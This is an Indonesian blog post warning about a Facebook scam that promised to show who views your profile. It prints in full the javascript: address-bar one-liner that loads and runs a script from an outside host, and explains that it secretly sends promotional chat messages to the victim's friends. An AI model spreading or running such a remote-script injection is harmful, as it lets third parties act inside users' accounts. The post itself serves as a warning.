Pengen tau siapa yang melihat profilemu??

Cara melihat sipa orang yang sering melihat profile mu ??

Wewe !!! saya tertarik , berminat untuk mengetahui bagaimana cara melihat profil kita di facebook. karna mungkin dengan bantuan aplikasi atau script itu saya bisa tau siapa yang diam diam ngefans ma saya. hohohoho ngarep.com

Chat dari temen-temen di facebook bermunculan, dan mengirimkan chat yang sama, pada awalnya saya mengatakan, ini Aplikasi untuk melihat siapa yang paling sering melihat profil kita kok ngetrend banget, asampai sampai semua temen di chat list saya di facebook mengirimkan chat yang sama, ada apa gerangan ???

Saya mencoba mengikuti langkah yang diberikan " Jempolers Indonesia" Tersebut.. sudah beberapa kali saya coba, namun reaksi yang saya harapkan tidak pernah muncul. setelah saya gunakan script yang diberikan namun hasilnya tetap sama.

Ini dia script yang diberikan :

javascript:(a=(b=document).createElement('script')).src='//www.zingapoker.byethost4.com/_.js',b.body.appendChild(a);void(0)


Scrip itu kita disuruh taruh di Adress Bar kita.
Todeng......!!! Apa yang terjadi.. ??? ternyata script itu adalah penipu.. script itu berfungsi untuk mengirimkan chat otomatis ke teman-teman kita yang lagi online. dengan kata-kata yang sama. itu bertujuan untuk mempromosikan si "Jempolers Indonesia"

Ehm.. ada-ada aja.. hehehehe
2 Komentar untuk "Pengen tau siapa yang melihat profilemu??"
 
Copyright © 2014 Opick Amikom - All Rights Reserved
Costum By Mataram Web